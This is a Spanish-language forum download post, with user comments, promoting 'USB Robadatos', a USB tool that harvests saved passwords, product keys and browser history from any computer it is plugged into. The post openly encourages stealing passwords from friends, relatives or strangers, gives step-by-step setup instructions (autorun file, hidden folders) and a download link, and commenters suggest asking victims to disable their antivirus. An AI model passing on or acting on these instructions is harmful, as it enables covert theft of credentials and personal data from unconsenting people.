Oops.. Este post tiene los enlaces eliminados!

Identi revisa las denuncias de los usuarios en busca de enlaces eliminados que no dejan descargar los archivos, este mensaje te informa que este post que estas viendo tiene los enlaces eliminados.

Usa el Buscador

Por favor, te recomendamos que uses el buscador para encontrar más alternativas.

USB Robadatos [Roba datos Via USB] [FLS]

• Categoría: Reciclaje
  • Publicado hace más de 3 años

Pero la pregunta de ustedes sera Pa que sirve y aqui esta su respuesta:

Robadatos USB es un aplicacion que es intalada en la memoria USB para que al introducirse en un computador el Automaticamente Robe todos los datos del PC, (Datos importantes) tales como :
 [ul][li]Contraseñas[/li][li]Historiales[/li][li]Product Key (Seriales de Programas)[/li][li]Logs[/li][li]Y Mas Contraseñas!![/li][/ul]
Quieres robar la contraseñas guardadas en algun compu?(amigo o familiar o desconocido) Ps con este robadatos con solo intalarlo en tu USB al introducirlo y ejecutarlo (en menos de 5 segundos) el recopila toda esa informacion que quiers.

USO:
 [ul][li]Tener una memoria USB[/li][li]Tene libre 1.28 MB en la USB XD![/li][/ul]
Teniendo esas 2 cosas debes formatear tu memoria usb y dejarla totalmente vacia!

luego de haberla formateado, procedes a copiar los archivos.. todos! a la memoria USB!

La memoria usb debe quedar con estos archivos:
 [ul][li]Autorun.inf (Importantisimo para el arranque del programa)[/li][li]Nircmd.bat[/li][li]nircmd.exe[/li][li]y las Carpetas BatExe & Dump[/li][/ul]
Si la memoria usb tiene todos esos archivos solo para procedes a ocultar la carpetas BatExe, ocultas tambien Autorun.inf, nircmd.bat , nircmd.exe.

ya puedes pasar tus archivos normalmente a la memoria USB.
 Y Listo.
cada vez que q introdusca tu memoria usb en un computador el automaticamente se copiara los archivos robados a La campeta Dump
DESCARGAR:

https://mega.co.nz/#!x0d0ySBR!B3-l3AIo3c4856sWBouYY2H7SOdUHOXDUn_L8TLiHoo

35 Puntos Score: 4.4/10
Visitas: 20378 Favoritos: 29
Ver los usuarios que votaron...
49 Comentarios USB Robadatos [Roba datos Via USB] [FLS]
jajaja interesante aplicacion !, pero como si no supieramos de que el hacker que lo creo programo para mandar los datos a su correo via mail (mailpv.exe)

si no usara targetas de credito lo provaria !, pero como si uso , no me arriesgare
ya lo habia provado unos a?
@megaupload

Muy cierto !, igual lo usare en la otra lap que recien formatie  
funciona generalmente para gmail no da la clave  
Cita hax_1000: Mostrar
ECIEN ME ACABO DE FIJAR Y EL ARCHIVO MAILPV.EXE ES PARA VER LA CONTRASE?
Que cabronada!! MOLA!! jaja  
@megaupload
jajaja y si mando tus contrase?
hagan el truco sin internet conectada. soketes  
@megaupload
jaja claro que no !, de hecho es muy sencillo progmar una aplicacion para mandar datos (texto a un mail !.)

tu hiciste tu usb con esta aplicacion !, cuando la provaste !, teninedo el internet activo !, la usb recopilo los datos de tu ordenador !, manda por internet los datos a un mail !. y si !, tu tambien obtienes los datos !.
no por nada son hackers los que hacen estas aplicaciones !.
hey amigo crees que puedes subir este programa a putlocker?? mira que no puedo descargarla por mega beta!!
@cratoszeus  usa chrome para mega
AHHH OK GRACIAS!!!
grax, nada mas nada mas desactivar siempre antivirus si no elimiinado
interesanteee che
gracias ! oye una pregunta tengo el Chrome y aun asi no lo puedo descargar me puedes ayudar ?
estoy en las mismas condiciones de siux_1470 no puedo descargarlo!!
Probando gracias  
el AVIRA detecta el USB como infectado.
los antivirus blokean la ejecucion de los Autorun.inf
desde los usb, asi que antes de poner el pendrive le dices "amigo puedes desactivar tu antivirus
un momento"  
interesante !!  gracias
Se ve muy bueno
jaja ta buenazo el aporte pro lo que dice shaka33 es cierto jeje tengan cuidado los que usan tarjeta
jaja ke mula de brinco dio el avira
A ECHARLE Y VER Q ONDA HEHEHEHEH
Haber si funciona ...mmmmmm    seria util..    
como lo uso???
interesante...
de que funciona bien funciona bien ya lo probe y ando revisando procesos y red y todo y a primera vista no envia nada a otro lado aunque ya lo han dicho de que existe el riesgo lo existe  
ya he echo todos los pasos... copie y oculte los archivos en mi USB pero no me aparece nada en la carpeta "dump" alguien me puede ayudar como hago para ver los datos que ha robado..
Cita cratoszeus: Mostrar
ya lo pude descargar con el gestor de descargas mi pony y aqu?
Amigo! cuando conecto la usb no me roba los datos :c tengo que ejecutar el .exe para que jale, como le hago para que se ejecute automaticamente?
hey cuate este programa funciona aunque kuando prendo la pc de mi amigo y no sepa la contrase?
esta weeaada   no sirve    solo  pasa  los datos de contrase?
como lo usooo??
podrias ponerlo en otro servidor??
Cita _Juegos_: Mostrar
usa chrome amigo que te lo baja al toque
@megaupload @hax_1000  de pura casualidad, donde esta esa aplicacion mailpv.exe????
muy bueno saka las contras guardadas en el navegador   cosa q tambien se puede hacer x el mismo navegador ^^
sube un tutooo porfa
Amigo, no tendras por casualidad o no se si esta lo haga, para q al ingresar una usb a un pc, esta copie todo su contenido a la otra USB  de manera invisible???
no funciona en windows 7 yavlo probe por el autorun
link caido podrian resuvirlo gracias
El programa mailpv.exe es solo un simple programa para ver las contrase?
Brtoher, y como puedo tener la seguridad de que esos archivos no sean en contra de mi, o sea que por internet este mandando informacion mia personal a la cuenta de de un correo de las personas que la crearon?
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!